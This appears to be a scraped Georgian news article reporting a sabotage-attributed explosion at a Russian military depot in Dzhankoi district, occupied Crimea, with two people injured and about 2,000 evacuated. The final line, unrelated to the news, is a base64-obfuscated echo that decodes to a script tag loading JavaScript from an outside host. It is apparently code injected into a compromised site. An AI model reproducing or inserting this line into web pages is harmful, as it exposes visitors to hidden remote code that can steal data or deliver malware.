celsiusi
ავერსი საქკაბელი
რუსეთის თავდაცვის სამინისტროში აცხადებენ, რომ ოკუპირებული ყირიმის ტერიტორიაზე ჯანკოეს რაიონში მომხდარი აფეთქება დივერსიის გამო მოხდა. ინფორმაციას რუსული მედია ავრცელებს.
 
„16 აგვისტოს დილით, დივერსიის შედეგად, დასახლებულ პუნქტ ჯანკოეს რაიონში დაზიანდა სამხედრო საწყობი. დივერსიის შედეგების აღმოსაფხვრელად მიმდინარეობს აუცილებელი ზომების მიღება“, – ნათქვამია თავდაცვის სამინისტროს განცხადებაში.
 
აფეთქება ოკუპირებული ყირიმის ჩრდილოეთ რეგიონში დღეს გამთენიისას მოხდა. ე.წ. ყირიმის რესპუბლიკის ხელმძღვანელის ინფორმაციით, დაშავებულია ორი პირი. მიმდებარე ტერიტორიიდან, ხუთი კილომეტრის რადიუსში ორი ათასამდე პირის ევაკუაცია განხორციელდა.
 
მომხდარს გამოეხმაურნენ უკრაინის პრეზიდენტის ოფისში და განაცხადეს, რომ დემილიტარიზაცია გრძელდება.
623
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");